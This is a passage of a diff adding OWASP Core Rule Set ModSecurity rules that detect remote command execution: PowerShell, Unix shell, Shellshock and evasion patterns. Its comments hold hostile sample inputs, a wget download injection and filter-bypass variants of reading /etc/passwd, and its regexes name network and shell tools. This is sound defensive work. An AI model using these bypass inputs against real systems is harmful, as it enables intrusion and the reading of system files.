capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows PowerShell, cmdlets and options ] +# +# Detect some common PowerShell commands, cmdlets and options. 
+# These commands should be relatively uncommon in normal text, but
+# potentially useful for code injection.
+#
+# If you are not running Windows, it is safe to disable this rule.
+#
+# https://technet.microsoft.com/en-us/magazine/ff714569.aspx
+# https://msdn.microsoft.com/en-us/powershell/scripting/core-powershell/console/powershell.exe-command-line-help
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile windows-powershell-commands.data" \
+ "id:932120,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:cmdLine,t:lowercase,\
+ msg:'Remote Command Execution: Windows PowerShell Command Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'language-powershell',\
+ tag:'platform-windows',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# [ Unix shell expressions ]
+#
+# Detects the following patterns which are common in Unix shell scripts
+# and one-liners:
+#
+# $(foo) Command substitution
+# ${foo} Parameter expansion
+# <(foo) Process substitution
+# >(foo) Process substitution
+# $((foo)) Arithmetic expansion
+#
+# Regexp generated from util/regexp-assemble/regexp-932130.data using Regexp::Assemble.
+# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\$(?:\((?:\(.*\)|.*)\)|\{.*\})|[<>]\(.*\))" \ + "id:932130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:cmdLine,\ + msg:'Remote Command Execution: Unix Shell Expression Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Windows FOR, IF commands ] +# +# This rule detects Windows command shell FOR and IF commands. +# If you are not running Windows, it is safe to disable this rule. +# +# Examples: +# +# FOR %a IN (set) DO +# FOR /D %a IN (dirs) DO +# FOR /F "options" %a IN (text|"text") DO +# FOR /L %a IN (start,step,end) DO +# FOR /R C:\dir %A IN (set) DO +# +# IF [/I] [NOT] EXIST filename | DEFINED define | ERRORLEVEL n | CMDEXTVERSION n +# IF [/I] [NOT] item1 [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] item2 +# IF [/I] [NOT] (item1) [==|EQU|NEQ|LSS|LEQ|GTR|GEQ] (item2) +# +# http://ss64.com/nt/if.html +# http://ss64.com/nt/for.html +# +# Regexp generated from util/regexp-assemble/regexp-932140.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx \b(?:if(?:/i)?(?: not)?(?: exist\b| defined\b| errorlevel\b| cmdextversion\b|(?: |\().*(?:\bgeq\b|\bequ\b|\bneq\b|\bleq\b|\bgtr\b|\blss\b|==))|for(?:/[dflr].*)? 
%+[^ ]+ in\(.*\)\s?do)" \ + "id:932140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:cmdLine,\ + msg:'Remote Command Execution: Windows FOR/IF Command Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix direct remote command execution ] +# +# Detects Unix commands at the start of a parameter (direct RCE). +# Example: foo=wget%20www.example.com +# +# This case is different from command injection (rule 932100), where a +# command string is appended (injected) to a regular parameter, and then +# passed to a shell unescaped. +# +# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit: +# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ] +# +# Due to a higher risk of false positives, the following changes have been +# made relative to rule 932100: +# 1) the set of commands is smaller +# 2) we require a trailing space (denoting command parameters) or command +# separator character after the command +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932150.txt] +# 
[\\\\'\"]*(?:\s|;|\||&|<|>)" \ +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m)|w[\\\\'\"]*p(?:[\\\\'\"]*-[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d)?|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|y[\\\\'\"]*n[\\\\'\"]*x)|s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d)|h(?:[\\\\'\"]*\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b)?|o[\\\\'\"]*(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|f[\\\\'\"]*t[\\\\'\"]*p|u[\\\\'\"]*d[\\\\'\"]*o|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|k[\\\\
'\"]*(?:e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*v|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|e[\\\\'\"]*r[\\\\'\"]*l(?:[\\\\'\"]*5)?|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|o[\\\\'\"]*p[\\\\'\"]*d)|n[\\\\'\"]*(?:c(?:[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|a[\\\\'\"]*t))?|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t)|o[\\\\'\"]*h[\\\\'\"]*u[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|i[\\\\'\"]*m[\\\\'\"]*e(?:[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t)?|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r)|e[\\\\'\"]*l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|m[\\\\'\"]*(?:u[\\\\'\"]*s[\\\\'\"]*e|d[\\\\'\"]*i)[\\\\'\"]*r|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c|c[\\\\'\"]*p)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]
*t[\\\\'\"]*i[\\\\'\"]*n|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*q)|u[\\\\'\"]*(?:n[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|l[\\\\'\"]*z[\\\\'\"]*m[\\\\'\"]*a|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l))|x[\\\\'\"]*(?:z(?:[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e))?|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s)|z[\\\\'\"]*(?:(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e|i)[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|f[\\\\'\"]*(?:t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o)|i[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h|c)|e[\\\\'\"]*(?:g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*h[\\\\'\"]*o|v[\\\\'\"]*a[\\\\'\"]*l|x[\\\\'\"]*e[\\\\'\"]*c|n[\\\\'\"]*v)|d[\\\\'\"]*(?:m[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*g|a[\\\\'\"]*s[\\\\'\"]*h|i[\\\\'\"]*f[\\\\'\"]*f|o[\\\\'\"]*a[\\\\'\"]*s)|g[\\\\
'\"]*(?:z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c)|j[\\\\'\"]*(?:o[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*\s+[\\\\'\"]*-[\\\\'\"]*x|a[\\\\'\"]*v[\\\\'\"]*a)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*i|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|i[\\\\'\"]*r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|o[\\\\'\"]*n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r|h[\\\\'\"]*(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)|v[\\\\'\"]*i[\\\\'\"]*(?:g[\\\\'\"]*r|p[\\\\'\"]*w)|G[\\\\'\"]*E[\\\\'\"]*T)[\\\\'\"]*(?:\s|;|\||&|<|>)" \ + "id:932150,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# [ Unix shell snippets ] +# +# Detect some common sequences found in shell commands and scripts. +# +# Some commands which were restricted in earlier rules due to FP, +# have been added here with their full path, in order to catch some +# cases where the full path is sent. 
+#
+# This rule is also triggered by an Apache Struts Remote Code Execution exploit:
+# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ]
+#
+# This rule is also triggered by an Oracle WebLogic Remote Command Execution exploit:
+# [ Oracle WebLogic vulnerability CVE-2017-10271 - Exploit tested: https://www.exploit-db.com/exploits/43458 ]
+
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile unix-shell.data" \
+ "id:932160,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase,\
+ msg:'Remote Command Execution: Unix Shell Code Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+# [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ]
+#
+# Detect exploitation of "Shellshock" GNU Bash RCE vulnerability.
+#
+# Based on ModSecurity rules created by Red Hat.
+# Permission for use was granted by Martin Prpic
+#
+# https://access.redhat.com/articles/1212303
+#
+SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
+ "id:932170,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecode,\
+ msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+SecRule ARGS_NAMES|ARGS|FILES_NAMES "@rx ^\(\s*\)\s+{" \
+ "id:932171,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:urlDecode,t:urlDecodeUni,\
+ msg:'Remote Command Execution: Shellshock (CVE-2014-6271)',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ctl:auditLogParts=+E,\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+#
+# -=[ Restricted File Upload ]=-
+#
+# Detects attempts to upload a file with a forbidden filename.
+#
+# Many application contain Unrestricted File Upload vulnerabilities.
+# https://www.owasp.org/index.php/Unrestricted_File_Upload
+#
+# These might be abused to upload configuration files or other files
+# that affect the behavior of the web server, possibly causing remote
+# code execution.
+# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name \ + "@pmFromFile restricted-upload.data" \ + "id:932180,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Restricted File Upload Attempt',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + +# +# -=[ Rule 932200 ]=- +# +# Block RCE Bypass using different techniques: +# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/) +# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) +# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8) +# +# Examples: +# - foo;cat$u+/etc$u/passwd +# - bar;cd+/etc;/bin$u/ca*+passwd +# - foo;ca\t+/et\c/pa\s\swd +# - foo;c'at'+/etc/pa's'swd +# +# Regex notes: https://regex101.com/r/JgZFRi/7 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ([*?`\\'][^/\n]+/|\$[({\[#a-zA-Z0-9]|/[^/]+?[*?`\\'])" \ + "id:932200,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,t:urlDecodeUni,\ + msg:'RCE Bypass Technique',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: 
%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + chain" + SecRule MATCHED_VAR "@rx /" "t:none,t:urlDecodeUni,chain" + SecRule MATCHED_VAR "@rx \s" "t:none,t:urlDecodeUni,\ + setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932015,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:932016,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +# Missing Unix commands have been added to a new word list i.e. +# util/regexp-assemble/regexp-932106.txt +# These commands may have a higher risk of false positives. +# Therefore, they have been split off to a separate rule in PL3. +# For explanation of this rule, see rule 932100. +# +# To rebuild the word list regexp: +# cd util/regexp-assemble +# cat regexp-932106.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# +# Then insert the assembled regexp into this template: +# +# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* +# [regexp assembled from util/regexp-assemble/regexp-932106.txt] +# \b" \ +# +# This rule is a stricter sibling of rule 932100. 
